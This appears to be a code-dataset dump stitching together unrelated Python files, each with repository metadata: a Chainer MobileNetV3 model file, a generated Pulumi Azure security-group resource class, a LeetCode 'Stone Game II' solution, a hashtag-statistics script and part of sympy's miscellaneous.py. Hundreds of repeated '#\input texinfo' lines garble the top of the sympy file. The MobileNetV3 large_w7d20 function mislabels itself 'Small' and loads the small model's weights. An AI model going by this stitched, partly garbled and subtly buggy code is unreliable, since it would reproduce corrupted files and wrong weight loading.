exp_channels = [[16], [64, 72], [72, 120, 120], [240, 200, 184, 184, 480, 672], [672, 960, 960]] kernels3 = [[1], [1, 1], [0, 0, 0], [1, 1, 1, 1, 1, 1], [0, 0, 0]] use_relu = [[1], [1, 1], [1, 1, 1], [0, 0, 0, 0, 0, 0], [0, 0, 0]] use_se = [[0], [0, 0], [1, 1, 1], [0, 0, 0, 0, 1, 1], [1, 1, 1]] first_stride = False final_use_se = False final_block_channels = 960 else: raise ValueError("Unsupported MobileNetV3 version {}".format(version)) classifier_mid_channels = 1280 if width_scale != 1.0: channels = [[int(cij * width_scale) for cij in ci] for ci in channels] init_block_channels = int(init_block_channels * width_scale) if width_scale > 1.0: final_block_channels = int(final_block_channels * width_scale) net = MobileNetV3( channels=channels, exp_channels=exp_channels, init_block_channels=init_block_channels, final_block_channels=final_block_channels, classifier_mid_channels=classifier_mid_channels, kernels3=kernels3, use_relu=use_relu, use_se=use_se, first_stride=first_stride, final_use_se=final_use_se, **kwargs) if pretrained: if (model_name is None) or (not model_name): raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.") from .model_store import get_model_file load_npz( file=get_model_file( model_name=model_name, local_model_store_dir_path=root), obj=net) return net def mobilenetv3_small_w7d20(**kwargs): """ MobileNetV3 Small 224/0.35 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=0.35, model_name="mobilenetv3_small_w7d20", **kwargs) def mobilenetv3_small_wd2(**kwargs): """ MobileNetV3 Small 224/0.5 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=0.5, model_name="mobilenetv3_small_wd2", **kwargs) def mobilenetv3_small_w3d4(**kwargs): """ MobileNetV3 Small 224/0.75 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=0.75, model_name="mobilenetv3_small_w3d4", **kwargs) def mobilenetv3_small_w1(**kwargs): """ MobileNetV3 Small 224/1.0 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=1.0, model_name="mobilenetv3_small_w1", **kwargs) def mobilenetv3_small_w5d4(**kwargs): """ MobileNetV3 Small 224/1.25 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="small", width_scale=1.25, model_name="mobilenetv3_small_w5d4", **kwargs) def mobilenetv3_large_w7d20(**kwargs): """ MobileNetV3 Small 224/0.35 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=0.35, model_name="mobilenetv3_small_w7d20", **kwargs) def mobilenetv3_large_wd2(**kwargs): """ MobileNetV3 Large 224/0.5 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=0.5, model_name="mobilenetv3_large_wd2", **kwargs) def mobilenetv3_large_w3d4(**kwargs): """ MobileNetV3 Large 224/0.75 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=0.75, model_name="mobilenetv3_large_w3d4", **kwargs) def mobilenetv3_large_w1(**kwargs): """ MobileNetV3 Large 224/1.0 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=1.0, model_name="mobilenetv3_large_w1", **kwargs) def mobilenetv3_large_w5d4(**kwargs): """ MobileNetV3 Large 224/1.25 model from 'Searching for MobileNetV3,' https://arxiv.org/abs/1905.02244. Parameters: ---------- pretrained : bool, default False Whether to load the pretrained weights for model. root : str, default '~/.chainer/models' Location for keeping the model parameters. """ return get_mobilenetv3(version="large", width_scale=1.25, model_name="mobilenetv3_large_w5d4", **kwargs) def _test(): import numpy as np import chainer chainer.global_config.train = False pretrained = False models = [ mobilenetv3_small_w7d20, mobilenetv3_small_wd2, mobilenetv3_small_w3d4, mobilenetv3_small_w1, mobilenetv3_small_w5d4, mobilenetv3_large_w7d20, mobilenetv3_large_wd2, mobilenetv3_large_w3d4, mobilenetv3_large_w1, mobilenetv3_large_w5d4, ] for model in models: net = model(pretrained=pretrained) weight_count = net.count_params() print("m={}, {}".format(model.__name__, weight_count)) assert (model != mobilenetv3_small_w7d20 or weight_count == 2845419) assert (model != mobilenetv3_small_wd2 or weight_count == 2907518) assert (model != mobilenetv3_small_w3d4 or weight_count == 3006542) assert (model != mobilenetv3_small_w1 or weight_count == 3105566) assert (model != mobilenetv3_small_w5d4 or weight_count == 3499970) assert (model != mobilenetv3_large_w7d20 or weight_count == 4603377) assert (model != mobilenetv3_large_wd2 or weight_count == 4806022) assert (model != mobilenetv3_large_w3d4 or weight_count == 5142614) assert (model != mobilenetv3_large_w1 or weight_count == 5479206) assert (model != mobilenetv3_large_w5d4 or weight_count == 6171478) x = np.zeros((1, 3, 224, 224), np.float32) y = net(x) assert (y.shape == (1, 1000)) if __name__ == "__main__": _test()
[ "osemery@gmail.com" ]
osemery@gmail.com
0a6d031e52c377dfeb5f3cf7f389bdc52a2c51d4
9cd180fc7594eb018c41f0bf0b54548741fd33ba
/sdk/python/pulumi_azure_nextgen/network/v20170901/application_security_group.py
ac52e3a85dabe4f471e82c5f7c30605886353ff6
[ "Apache-2.0", "BSD-3-Clause" ]
permissive
MisinformedDNA/pulumi-azure-nextgen
c71971359450d03f13a53645171f621e200fe82d
f0022686b655c2b0744a9f47915aadaa183eed3b
refs/heads/master
2022-12-17T22:27:37.916546
2020-09-28T16:03:59
2020-09-28T16:03:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
8,134
py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables __all__ = ['ApplicationSecurityGroup'] class ApplicationSecurityGroup(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, application_security_group_name: Optional[pulumi.Input[str]] = None, id: Optional[pulumi.Input[str]] = None, location: Optional[pulumi.Input[str]] = None, resource_group_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None, __name__=None, __opts__=None): """ An application security group in a resource group. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] application_security_group_name: The name of the application security group. :param pulumi.Input[str] id: Resource ID. :param pulumi.Input[str] location: Resource location. :param pulumi.Input[str] resource_group_name: The name of the resource group. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags. """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() if application_security_group_name is None: raise TypeError("Missing required property 'application_security_group_name'") __props__['application_security_group_name'] = application_security_group_name __props__['id'] = id __props__['location'] = location if resource_group_name is None: raise TypeError("Missing required property 'resource_group_name'") __props__['resource_group_name'] = resource_group_name __props__['tags'] = tags __props__['etag'] = None __props__['name'] = None __props__['provisioning_state'] = None __props__['resource_guid'] = None __props__['type'] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/latest:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20171001:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20171101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180401:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180601:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180701:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20180801:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20181001:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20181101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20181201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190401:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190601:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190701:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190801:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20190901:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20191101:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20191201:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200301:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200401:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200501:ApplicationSecurityGroup"), pulumi.Alias(type_="azure-nextgen:network/v20200601:ApplicationSecurityGroup")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(ApplicationSecurityGroup, __self__).__init__( 'azure-nextgen:network/v20170901:ApplicationSecurityGroup', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'ApplicationSecurityGroup': """ Get an existing ApplicationSecurityGroup resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() return ApplicationSecurityGroup(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def etag(self) -> pulumi.Output[str]: """ A unique read-only string that changes whenever the resource is updated. """ return pulumi.get(self, "etag") @property @pulumi.getter def location(self) -> pulumi.Output[Optional[str]]: """ Resource location. """ return pulumi.get(self, "location") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Resource name. """ return pulumi.get(self, "name") @property @pulumi.getter(name="provisioningState") def provisioning_state(self) -> pulumi.Output[str]: """ The provisioning state of the application security group resource. Possible values are: 'Succeeded', 'Updating', 'Deleting', and 'Failed'. """ return pulumi.get(self, "provisioning_state") @property @pulumi.getter(name="resourceGuid") def resource_guid(self) -> pulumi.Output[str]: """ The resource GUID property of the application security group resource. It uniquely identifies a resource, even if the user changes its name or migrate the resource across subscriptions or resource groups. """ return pulumi.get(self, "resource_guid") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Resource tags. """ return pulumi.get(self, "tags") @property @pulumi.getter def type(self) -> pulumi.Output[str]: """ Resource type. """ return pulumi.get(self, "type") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
[ "public@paulstack.co.uk" ]
public@paulstack.co.uk
e89f4fa1910b5e1ead9f3d1bcd08b5811ee1944a
5a8214b3a452c574e6c883bf5d90ba58ba87c461
/leetcode/1140.stone-game-ii.py
abbfd17a569afa2a85d2de22865c2faaa350ab43
[]
no_license
phlalx/algorithms
69a3c8519687816e3c6333ec12b40659d3e3167f
f4da5a5dbda640b9bcbe14cb60a72c422b5d6240
refs/heads/master
2023-02-03T10:30:30.181735
2020-12-26T09:47:38
2020-12-26T09:47:38
129,254,618
0
0
null
null
null
null
UTF-8
Python
false
false
2,129
py
# # @lc app=leetcode id=1140 lang=python3 # # [1140] Stone Game II # # https://leetcode.com/problems/stone-game-ii/description/ # # algorithms # Medium (62.00%) # Likes: 335 # Dislikes: 75 # Total Accepted: 11.4K # Total Submissions: 18.4K # Testcase Example: '[2,7,9,4,4]' # # Alex and Lee continue their games with piles of stones.  There are a number # of piles arranged in a row, and each pile has a positive integer number of # stones piles[i].  The objective of the game is to end with the most stones.  # # Alex and Lee take turns, with Alex starting first.  Initially, M = 1. # # On each player's turn, that player can take all the stones in the first X # remaining piles, where 1 <= X <= 2M.  Then, we set M = max(M, X). # # The game continues until all the stones have been taken. # # Assuming Alex and Lee play optimally, return the maximum number of stones # Alex can get. # # # Example 1: # # # Input: piles = [2,7,9,4,4] # Output: 10 # Explanation: If Alex takes one pile at the beginning, Lee takes two piles, # then Alex takes 2 piles again. Alex can get 2 + 4 + 4 = 10 piles in total. If # Alex takes two piles at the beginning, then Lee can take all three piles # left. In this case, Alex get 2 + 7 = 9 piles in total. So we return 10 since # it's larger. # # # # Constraints: # # # 1 <= piles.length <= 100 # 1 <= piles[i] <= 10 ^ 4 # # # TAGS dp # very classic dp # @lc code=start import functools class Solution: def stoneGameII(self, piles: List[int]) -> int: total = sum(piles) n = len(piles) @functools.lru_cache(maxsize=None) def f(i, M) -> int: # return best score achievable by player if i == n: return 0 else: best = float('-inf') cur_sum = 0 # last pile taken by player for x in range(i, min(i + 2 * M, n)): cur_sum += piles[x] best = max(best, cur_sum - f(x+1, max(M, x-i+1))) return best score = f(0, 1) return (total + score) // 2 # @lc code=end
[ "phlalx@users.noreply.github.com" ]
phlalx@users.noreply.github.com
c1b22849629d6c3615ebfb29f802a866b205482b
3b79a802f8dd9f26bee0bfde4630ac0cab932803
/srcHashTag/statisticHashtag.py
11eb49bb3a43550f017598f6d4cfd9ad00cbd48b
[]
no_license
qolina/Twevent
87fc4706564088361e9db6ddc44efc10647e67fe
4b90b0604493b20dee90448c17e0a8e0d557165e
refs/heads/master
2021-06-24T19:06:02.022882
2017-08-15T05:20:09
2017-08-15T05:20:09
100,341,172
1
0
null
null
null
null
UTF-8
Python
false
false
5,044
py
#! /usr/bin/env python #coding=utf-8 import time import re import os import math import cPickle ############################ ## load tweets' social feature def loadsocialfeature(filepath): inFile = file(filepath,"r") tweSFHash = cPickle.load(inFile) inFile.close() print "### " + str(time.asctime()) + " " + str(len(tweSFHash)) + " tweets' social features are loaded from " + inFile.name return tweSFHash ''' feahash["RT"] = RT feahash["Men"] = Men feahash["Reply"] = Reply feahash["Url"] = Url feahash["RTC"] = RTC feahash["Fav"] = Fav feahash["Tag"] = Tag feahash["Past"] = Past ''' ############################ ## def statisticHashtag(dataFilePath, toolDirPath): fileList = os.listdir(dataFilePath) # output hashtag statistics hashtagfreqFile = file(toolDirPath + "hashTagFreqFile", "w") hashtagFile = file(toolDirPath + "hashTagFile", "w") hashtagByTFFile = file(toolDirPath + "hashTagTFFile", "w") hashtagByDFFile = file(toolDirPath + "hashTagDFFile", "w") hashTagHashAppHash = {} tweetTagHash = {} for item in sorted(fileList): if item.find("segged") != 0: continue tStr = item[len(item)-2:len(item)] print "Time window: " + tStr tweetSocialFeatureFilePath = toolDirPath + "tweetSocialFeature" + tStr tweSFHash = loadsocialfeature(tweetSocialFeatureFilePath) tagHash = dict([(tid, tweSFHash[tid]["Tag"]) for tid in tweSFHash if len(tweSFHash[tid]["Tag"]) > 1]) tweetTagHash.update(tagHash) print "### " + str(time.asctime()) + " " + str(len(tagHash)) + " tweets contain hashtags" tweSFHash.clear() for tid in tagHash: tagStr = tagHash[tid] tagArr = tagStr.split(" ") for tag in tagArr: illegelLetter = False for letter in tag: encodeNum = ord(letter) if (encodeNum < 32) | (encodeNum > 126): illegelLetter = True break # if re.match("[a-zA-Z0-9]", letter): # puncOnly = False if illegelLetter: #contain illegel letter continue apphash = {} if tag in hashTagHashAppHash: apphash = hashTagHashAppHash[tag] if tid in apphash: apphash[tid] += 1 else: apphash[tid] = 1 hashTagHashAppHash[tag] = apphash # print tag + " " + str(apphash) print "### " + str(len(hashTagHashAppHash)) + " hashtags are loaded already." print "### " + str(time.asctime()) + " " + str(len(hashTagHashAppHash)) + " hashtag are loaded." print "### " + str(time.asctime()) + " " + str(len(tweetTagHash)) + " tweets contain hashtags." cPickle.dump(hashTagHashAppHash, hashtagfreqFile) hashtagList = hashTagHashAppHash.keys() sortedByTF = {} sortedByDF = {} tagLenHash = {} for tag in sorted(hashtagList): apphash = hashTagHashAppHash[tag] df = len(apphash) tf = sum(apphash.values()) sortedByTF[tag] = tf sortedByDF[tag] = df hashtagFile.write(tag + "\t" + str(tf) + "\t" + str(df) + "\n") tagLen = len(tag) if tagLen in tagLenHash: tagLenHash[tagLen] += 1 else: tagLenHash[tagLen] = 1 print "### " + str(sum(tagLenHash.values())) + " hash tags, length distribution: " print sorted(tagLenHash.items(), key = lambda a:a[1], reverse = True) for tagItem in sorted(sortedByTF.items(), key = lambda a:a[1], reverse = True): tag = tagItem[0] tf = tagItem[1] df = sortedByDF[tag] hashtagByTFFile.write(tag + "\t" + str(tf) + "\t" + str(df) + "\n") for tagItem in sorted(sortedByDF.items(), key = lambda a:a[1], reverse = True): tag = tagItem[0] df = tagItem[1] tf = sortedByTF[tag] hashtagByDFFile.write(tag + "\t" + str(tf) + "\t" + str(df) + "\n") hashtagFile.close() hashtagByTFFile.close() hashtagByDFFile.close() hashtagfreqFile.close() print "### " + str(time.asctime()) + " hashtag statistics (alpha order) are stored into " + hashtagFile.name print "### " + str(time.asctime()) + " hashtag statistics (tf) are stored into " + hashtagByTFFile.name print "### " + str(time.asctime()) + " hashtag statistics (df) are stored into " + hashtagByDFFile.name print "### " + str(time.asctime()) + " hashtag statistics (dump) are stored into " + hashtagfreqFile.name ############################ ## main Function print "###program starts at " + str(time.asctime()) dataFilePath = r"../Data_hfmon/segged_ltwe/" toolDirPath = r"../Tools/" statisticHashtag(dataFilePath, toolDirPath) print "###program ends at " + str(time.asctime())
[ "qolina@gmail.com" ]
qolina@gmail.com
7efa918f1bb495b80442d7de7a5651b98bfc7627
6437a3a4a31ab9ad233d6b2d985beb50ed50de23
/PythonistaAppTemplate/PythonistaKit.framework/pylib_ext/sympy/functions/elementary/miscellaneous.py
9f57f5abdd1fb7364e12d77da04ab50572d84e26
[]
no_license
sreyemnayr/jss-lost-mode-app
03ddc472decde3c17a11294d8ee48b02f83b71e7
3ff4ba6fb13f4f3a4a98bfc824eace137f6aabaa
refs/heads/master
2021-05-02T08:50:10.580091
2018-02-08T20:32:29
2018-02-08T20:32:29
120,813,623
1
0
null
null
null
null
UTF-8
Python
false
false
23,913
py
#\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo #\input texinfo from __future__ import print_function, division from sympy.core import S, C, sympify from sympy.core.add import Add from sympy.core.basic import Basic from sympy.core.containers import Tuple from sympy.core.numbers import Rational from sympy.core.operations import LatticeOp, ShortCircuit from sympy.core.function import Application, Lambda, ArgumentIndexError from sympy.core.expr import Expr from sympy.core.singleton import Singleton from sympy.core.rules import Transform from sympy.core.compatibility import as_int, with_metaclass, xrange from sympy.core.logic import fuzzy_and class IdentityFunction(with_metaclass(Singleton, Lambda)): """ The identity function Examples ======== >>> from sympy import Id, Symbol >>> x = Symbol('x') >>> Id(x) x """ __slots__ = [] nargs = 1 def __new__(cls): x = C.Dummy('x') #construct "by hand" to avoid infinite loop return Expr.__new__(cls, Tuple(x), x) Id = S.IdentityFunction ############################################################################### ############################# ROOT and SQUARE ROOT FUNCTION ################### ############################################################################### def sqrt(arg): """The square root function sqrt(x) -> Returns the principal square root of x. Examples ======== >>> from sympy import sqrt, Symbol >>> x = Symbol('x') >>> sqrt(x) sqrt(x) >>> sqrt(x)**2 x Note that sqrt(x**2) does not simplify to x. >>> sqrt(x**2) sqrt(x**2) This is because the two are not equal to each other in general. For example, consider x == -1: >>> from sympy import Eq >>> Eq(sqrt(x**2), x).subs(x, -1) False This is because sqrt computes the principal square root, so the square may put the argument in a different branch. This identity does hold if x is positive: >>> y = Symbol('y', positive=True) >>> sqrt(y**2) y You can force this simplification by using the powdenest() function with the force option set to True: >>> from sympy import powdenest >>> sqrt(x**2) sqrt(x**2) >>> powdenest(sqrt(x**2), force=True) x To get both branches of the square root you can use the RootOf function: >>> from sympy import RootOf >>> [ RootOf(x**2-3,i) for i in (0,1) ] [-sqrt(3), sqrt(3)] See Also ======== sympy.polys.rootoftools.RootOf, root, real_root References ========== * http://en.wikipedia.org/wiki/Square_root * http://en.wikipedia.org/wiki/Principal_value """ # arg = sympify(arg) is handled by Pow return C.Pow(arg, S.Half) def cbrt(arg): """This function computes the principial cube root of `arg`, so it's just a shortcut for `arg**Rational(1, 3)`. Examples ======== >>> from sympy import cbrt, Symbol >>> x = Symbol('x') >>> cbrt(x) x**(1/3) >>> cbrt(x)**3 x Note that cbrt(x**3) does not simplify to x. >>> cbrt(x**3) (x**3)**(1/3) This is because the two are not equal to each other in general. For example, consider `x == -1`: >>> from sympy import Eq >>> Eq(cbrt(x**3), x).subs(x, -1) False This is because cbrt computes the principal cube root, this identity does hold if `x` is positive: >>> y = Symbol('y', positive=True) >>> cbrt(y**3) y See Also ======== sympy.polys.rootoftools.RootOf, root, real_root References ========== * http://en.wikipedia.org/wiki/Cube_root * http://en.wikipedia.org/wiki/Principal_value """ return C.Pow(arg, C.Rational(1, 3)) def root(arg, n): """The n-th root function (a shortcut for ``arg**(1/n)``) 